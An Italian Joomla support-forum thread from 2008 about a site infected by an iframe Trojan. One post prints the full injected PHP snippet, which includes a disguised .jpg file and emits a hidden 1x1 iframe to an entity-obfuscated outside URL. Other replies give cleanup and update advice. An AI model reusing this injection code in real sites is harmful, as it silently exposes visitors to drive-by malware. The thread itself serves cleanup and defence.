Back to top

Autore Topic: sito infetto da un trojan  (Letto 7474 volte)

Offline frank69

  • Appassionato
  • ***
  • Post: 250
    • Mostra profilo
sito infetto da un trojan
« il: 25 Apr 2008, 17:25:38 »
Ciao a tutti

ho un sito fatto in joomla 1.0 con i moduli virtuemart e zoomgallery e mi sono beccato un virus un bel trojan credo

appena mi sono collegato la prima volta

http://concorso.charliecosmesi.it/ecommerce/ sito pulito

l'antivirus sul mio pc ha rilevato il trojan
Trojan-Clicker.html.IFrame.od

poi non ha rilevato piu niente
ma il sito e sempre bloccato non si collega piu

come faccio per toglierlo se è lui e come faccio
a fare una scansione del sito cosa mai fatta
che antivirus si usa i soliti oppure qualcuno in particolare

ciao e grazie
« Ultima modifica: 30 Apr 2008, 13:13:36 da frank69 »

Offline sali40

  • Global Moderator
  • Instancabile
  • ********
  • Post: 4791
  • Sesso: Maschio
    • Mostra profilo
Re: sito infetto da un trojan
« Risposta #1 il: 26 Apr 2008, 01:00:19 »
dovresti vedere se ci sono su dei file che non dovrebbero esserci e se i file del core sono stati modificati. L'hoster dovrebbe poterti aiutare

Offline frank69

  • Appassionato
  • ***
  • Post: 250
    • Mostra profilo
Re: sito infetto da un trojan
« Risposta #2 il: 29 Apr 2008, 11:41:09 »
ok risolto

non so se puo servire a qualcuno sto trojan aveva modificato tutti i file php inserendo all'inizio e alla fine questo codice

Citazione
<?php

   error_reporting(0);

   if (file_exists("/web/htdocs/concorso.charliecosmesi.it/home/votazione/albums/userpics/10001/45563131x.jpg")) {

   include("/web/htdocs/concorso.charliecosmesi.it/home/votazione/albums/userpics/10001/45563131x.jpg");

   } else

   if (ini_get("register_globals")) {

      if($GLOBALS["fx"]==0) {

         $GLOBALS["fx"]=1;

         echo "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";

      }

   } else {

      echo "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";

   }

   ?>

e anche inserendelo alla fine di tutti i file html e piu un paio di immagine che io non avevo mai messo. per risolvere il problema basta guardare la data dei file cambiati e modificare il codice riportandolo com'era prima

ciao ciao

Offline tommy74

  • Appassionato
  • ***
  • Post: 241
  • Sesso: Maschio
  • viva l'open source !!!! .. e joomla !!
    • Mostra profilo
Re: sito infetto da un trojan
« Risposta #3 il: 19 Mag 2008, 15:30:12 »
ciao .. ho avuto lo stesso problema con il componente AJAX Shoutbox Version: 1.2 ... che ho disinstallato ..
vorrei capire se questi virus sono presenti già quando si installa il componente (vedi componenti scaricati da siti non ufficiali) oppure se vengono iniettati a posteriori ..
inoltre la responsabilità è del componenete bucato o dell'hosting che ospita il sito ?
Futuri Medici. Studenti, specializzandi e medici d'Italia

Offline wolfabrizio

  • Team Joomla.it
  • Esploratore
  • *******
  • Post: 130
  • Sesso: Maschio
    • Mostra profilo
Re: sito infetto da un trojan
« Risposta #4 il: 20 Mag 2008, 00:38:43 »
ciao .. ho avuto lo stesso problema con il componente AJAX Shoutbox Version: 1.2 ... che ho disinstallato ..
vorrei capire se questi virus sono presenti già quando si installa il componente (vedi componenti scaricati da siti non ufficiali) oppure se vengono iniettati a posteriori ..
inoltre la responsabilità è del componenete bucato o dell'hosting che ospita il sito ?

Ti rispondo io così rispondo anche all'altro topic che ti riguarda.
Riguardo alle responsabilità... come si dice... la colpa nasce orfana  ;D
A parte gli scherzi, dipende dal tipo di intrusione che si riceve e se avviene dal proprio sito o dal server, a sua volta magari da un'altro sito.
La principale via di ingresso sono i componenti, e raramente il core, che possono essere violati.
E' importantissimo, anzi di più  ::), mantenere l'aggiornamento di Joomla e dei componenti utilizzati, tenete sempre d'occhio con una certa assiduità i forum vari su joomla nelle sezioni che parlano di sicurezza.( a proposito nel primo post vedo un "joomla 1.0", voglio sperare che sia un errore di battitura altrimenti è già andata bene ... ::) )
Un mancato aggiornamento, associato magari ad una scarsa attenzione da parte dell'hoster può causare il down completo di un server e di buona parte dei domini ospitati.
Ecco perché è sempre bene fare tre cose:
-Tenere aggiornato tutto
-Tenere aggiornato tutto
-Tenere aggiornato tutto  ;D ;D ;D
... e se non cisono aggiornamenti  ??? : DISINTALLARE  >:(
---
Per quanto riguarda l'altro topic, per controllare il sito di Tommy74 ho semplicemente utilizzato FF con NoScript, evidenziato con il cursore la parte da prima dell'icona di NS a qualche parola dopo, tasto destro sopra, "Visualizza sorgente selezione" copiato l'URL e spippolato  ::) un po' con una nuova sessione di FF.

Ciauz e buon lavoro/divertimento  a tutti  ;)
Wolfab
"I popoli non dovrebbero aver paura dei propri governi, sono i governi che dovrebbero aver paura dei propri popoli." Thomas Jefferson

Offline tommy74

  • Appassionato
  • ***
  • Post: 241
  • Sesso: Maschio
  • viva l'open source !!!! .. e joomla !!
    • Mostra profilo
Re: sito infetto da un trojan
« Risposta #5 il: 20 Mag 2008, 00:51:35 »
grazie ... aggiorno sempre tutti i componenti con cura maniacale !!
... in effetti AJAX Shoutbox Version: 1.2 non viene aggiornato dai realizzatori da quasi un anno..
Futuri Medici. Studenti, specializzandi e medici d'Italia

 



Web Design Bolzano Kreatif